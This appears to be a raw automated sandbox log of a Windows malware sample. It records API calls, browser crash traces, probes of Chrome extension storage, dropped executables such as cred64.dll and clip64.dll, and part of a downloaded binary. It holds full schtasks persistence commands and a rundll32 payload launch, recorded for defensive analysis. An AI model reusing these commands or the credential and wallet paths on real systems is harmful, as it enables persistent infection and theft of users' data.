1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

number_of_free_clusters: 8362495
sectors_per_cluster: 8362495
bytes_per_sector: 512
root_path: C:
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9859653632
free_bytes_available: 9859653632
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9934028800
free_bytes_available: 9934028800
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10011496448
free_bytes_available: 10011496448
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10011496448
free_bytes_available: 10011496448
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
Application Crash Process iexplore.exe with pid 2776 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75b94387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x754bef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x754b6b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x754b6a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x754d5c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x755506b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75c6d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75c6d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75c6ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75b88a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75b88938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75b8950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75c6dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75c6db41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75c6e1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75b89367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75b89326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755f788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75b4a48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75b4853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75b4a4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75b5cd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75b5d87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 103673428
registers.edi: 79945484
registers.eax: 103673428
registers.ebp: 103673508
registers.edx: 4164878962
registers.ebx: 103673792
registers.esi: 2147746133
registers.ecx: 79678152
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x729b540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x729b52ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72a90ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7559b727
registers.esp: 71818224
registers.edi: 1974991376
registers.eax: 71818224
registers.ebp: 71818304
registers.edx: 1
registers.ebx: 5460556
registers.esi: 2147746133
registers.ecx: 2082696782
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
domain ipinfo.io
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Roaming\Temp\Task.bat
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\nsl94D5.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\n6P8X5rop5bCHCDpw23f.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe
cmdline schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\rty25.exe
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\clip64[1].dll
file C:\Users\test22\AppData\Local\Temp\nsz9DA0.tmp
file C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\Z2A_k3kHrLyUiJQeXEs0.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\KdWG1WnjbLO0ejuSam0V.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\face.exe
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\nsl94D5.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8CEyWgPtgDj3ygdsYA34.exe
file C:\Users\test22\AppData\Local\Temp\jobA4F6U_tCj88G2a2\8G51dyVKnnvS40g1JD2e.exe
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2448
thread_handle: 0x00000140
process_identifier: 2444
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x0000013c
1 1 0

CreateProcessInternalW

thread_identifier: 2556
thread_handle: 0x00000148
process_identifier: 2552
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 134217728 (CREATE_NO_WINDOW)
inherit_handles: 0
process_handle: 0x00000144
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000493001\latestrocki.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000495001\SetupPowerGREPDemo.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 8192
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x02920000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $šÇƒ®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýߦíýŒÎèüó¦íýŒÎéü̦íýŒÎîü˦íý×Þnýצíý×Þ~ýû¦íýÞ¦ìý÷¤íý{ÏãüŽ¦íý{Ïîüߦíý{ÏýߦíýÞ¦zýߦíý{ÏïüߦíýRichÞ¦íýPEL¼]¯eà" ¬ LwÀ @`,@€@@dŽ |@ @à ”uð 4  @À ”.text« ¬  `.rdata‚ûÀ ü° @@.datalpÀ H¬ @À.rsrc@@ ’ô @@.reloc”uà v† @B¹t Mè8ýhé#DèðYÃhó#DèƒðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYá0MQ‹@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYù%M蝘h?$DèÕïYÃV‹ñN贇N謇j(VèâìYY‹Æ^ÂU‹ìƒì8Ç0MtÉI3ÒÇœM0ÉI‰ M‰¤MVQf‰¨Mèo¡0M‹@ǀ0M\ÉI¡0M‹H”ûÿÿ‰,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMè헹øMè㗹Mèٗ3À¹„M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xM蛗3ÀǬM<ÉI¹M£”M£˜Mf£œM£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèϖ¹(Mè€ÇM<ÉI3Ò¹M‰M‰M‰ M膹@M蓖3À¹„MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0M‹HÁ4M薍Mè胼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£€Mf£lM¢”M¢}M£\MÿhÂI‹ð…ö… 3҉|MèÂRÿhÈI¸0M^É¡0M¹@MV‹@ǀ0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨M‹Î腕h ÉI‹ÎèoW¸0M^ÂV‹ñNèe•Nè
request_handle: 0x00cc000c
1 1 0

InternetReadFile

